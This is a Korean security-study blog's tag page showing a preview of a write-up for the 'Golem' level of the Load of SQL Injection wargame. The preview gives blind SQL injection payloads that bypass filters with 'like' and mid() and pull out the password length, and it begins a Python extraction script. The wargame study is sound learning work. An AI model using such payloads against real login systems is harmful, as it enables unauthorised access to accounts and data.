살아가는 이야기

  • 홈
  • 태그
  • 방명록

loadofsqlinjectiongolem 1

[Load of SQL Injection] Golem

-참일 때 ?pw=1'||'1' like '1' %23 -거짓일 때 ?pw=1'||'1' like '2' %23 1. 필터링 우회하기 1. '='(등호)는 like 로 대체가능 2. substr()는 mid()로 대체가능 2. pw 길이 알아내기 ?pw=1'||length(pw) like 8 %23 select id from prob_golem where id='guest' and pw='1'||length(pw) like 8 #' --> Hello admin 출력 --> 참 따라서 pw의 길이는 8 2. pw 알아내기 ?pw=1'||mid(pw, n, 1) like '? --> python 사용 import requests cookies={'PHPSESSID':'쿠키값'} url ="https://lo..

보안 공부/Load of SQL injection 2022.01.28
1
더보기
프로필사진

  • 분류 전체보기 (146)
    • 보안 공부 (79)
      • webhacking.kr (32)
      • Load of SQL injection (23)
      • Dreamhack.io (3)
      • 해킹기법 (5)
      • 암호학 (14)
    • 프로그래밍 공부 (22)
      • 백준 문제풀기 (7)
      • 기록노트 (7)
      • 데이터분석 (3)
      • python (4)
      • JavaScript (1)
      • C++ (0)
    • 자바 공부 (10)
    • 웹개발 (3)
      • HTML (0)
      • CSS (0)
      • JS (0)
      • node.JS (0)
      • PHP (0)
      • SQL (3)
    • .-! (0)
    • 학교생활 (18)
      • 운영체제 (16)
    • 사는 이야기 (8)
    • 영어 짱이 될거야 (4)

Tag

백준, 해킹공부, 웹해킹공부, 영어, 토익스피킹예시, 영어공부, 웹해킹, IT공부, sqlInjection, webhacking.kr, 보안공부, 보안, webhacking.kr44, toeic, 토익스피킹, 개발공부, 토익, It, LoadofSQLinjection, Toeicspeaking,

최근글과 인기글

  • 최근글
  • 인기글

최근댓글

페이스북 트위터 플러그인

  • Facebook
  • Twitter

Archives

Calendar

«   2025/05   »
일 월 화 수 목 금 토
1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31

방문자수Total

  • Today :
  • Yesterday :

Copyright © Kakao Corp. All rights reserved.

티스토리툴바